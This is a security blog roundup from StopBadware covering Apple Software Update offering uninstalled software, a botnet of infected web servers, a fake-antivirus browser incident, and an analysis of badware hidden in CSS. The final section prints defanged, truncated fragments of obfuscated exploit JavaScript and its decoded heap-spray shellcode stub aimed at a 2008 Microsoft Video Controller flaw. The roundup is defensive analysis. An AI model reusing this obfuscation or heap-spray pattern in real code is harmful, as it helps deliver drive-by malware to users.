Bloggers such as Ed Zott reported this week that Apple once again used its Apple Software Update tool to offer "updates" to software that was not installed on the user’s computer:

Under the Updates heading, Apple says I need the iPhone Configuration Utility. Oh really? Why, for heaven’s sake? I’ve never plugged an iPhone (or an iPod or any other Apple-branded hardware) into this computer. I have absolutely no need for this program. It will do nothing except take up disk space and memory and potentially represent a vector for security issues.

Ed updated the post about a day later to indicate that Apple had changed its behavior:

The iPhone configuration utility has apparently been removed from the Updates list. The contents of the New Software section are unchanged however, with QuickTime and iTunes both being selected by default when using the Apple Software Update utility. Thanks to Gregg Keizer of Computerworld for the tip.

StopBadware readers may recall that Apple found itself on the wrong side of the community last year, when Apple Software Update started pitching Safari and iTunes as "updates," when the apps were not installed on users’ computers. They changed their behavior after a community backlash that included pressure from StopBadware.org. Some felt at the time that Apple did not go far enough in changing the language of the tool, pointing out that these optional application installs were still selected by default in the update tool. However, this is the first time since then that we’ve heard about another false update. One presumes it was a mistake on Apple’s part, but even so, Apple should know better after last year’s experience.

Over at the Unmask Parasites blog, periodic BadwareBusters.org contributor Denis reports on a botweb (a term coined by our own Oliver Day) that he’s been investigating:

What we see here is a long awaited botnet of zombie web servers! A group of interconnected infected web servers with common control center involved in malware distribution. To make things more complex, this botnet of web servers is connected with the botnet of infected home computer (the malware they serve infects computers and turns them into zombies).

The blog post contains a much more thorough analysis of the issue and is worth a read, especially if you work for a hosting provider or manage Linux-based web servers. Meanwhile, we’ve reached out to Denis to see if we can assist in notifying providers that are hosting compromised servers.

Over on our community site, BadwareBusters.org, user DrHenley reports ill effects from visiting a badware site using Firefox on Ubuntu:

I could not close FireFox, and it required a reboot to stop the popups. After rebooting the first time I ran FireFox a tab called “My Computer???” came up with the bogus antivirus supposedly scanning the C:\Windows\System folder…(in Ubuntu – ROFL), but I was able to close the tab that time, and it didn’t come back after that.

While there’s no evidence that badware penetrated beyond the browser into the OS, this user’s experience does show that the browser can be a point of vulnerability, even on Linux.

We see a lot of fun hiding spots for javascript at the StopBadware office as we process webmaster appeals.  Last week we realized something that the Matasano team stated in their recent blog entry for their new testing tool: debugging tools aren’t always tuned with security people in mind. 

As I was processing a website it was pretty obvious from the flow of the requests that badware was being loaded from somewhere and it was coming from loading-atm net.  All I had to do was track down where the call was coming from.  But searching through the first two GET responses didn’t show anything makeing a covert or overt call to the website.

One of the nice features of Burp Proxy (a javascript web application debugging tool) is that it will filter out certain responses like binaries.  However it also defaults to stripping CSS responses from view which is unfortunately where this particular badware was hiding.  It isn’t difficult to enable them again (simply check CSS in the filter view).

I have been seeing more attack javascript using google timer objects.  I’m not sure if this is to improve the reliability of the exploit but it is an interesting signature of the code.  I’ve included a sample below (spaces added):

func tion a(){goo gle.timers.load.t.ol=(new Date).getTime();google.report&&google.report(google.timers.load,google.kCSI)}window.on load=function(){var str=[‘GIANT STRI NG OF NUMBERS’];var c=’’;for(var i=0;i

This decodes to the following (spaces added):

func tion directshow(){var shellc ode=unescape("ENCODED SHELLCODE");var bigblock=unescape("%u90 90%u9090");var headersize=20;var slackspace=headersize+shellcode.length;while(bigblock.length

wepawet shows that this attacks a 2008 vulnerability in the Microsoft Video Controller.

Virus total identifies the executable as a zbot variant.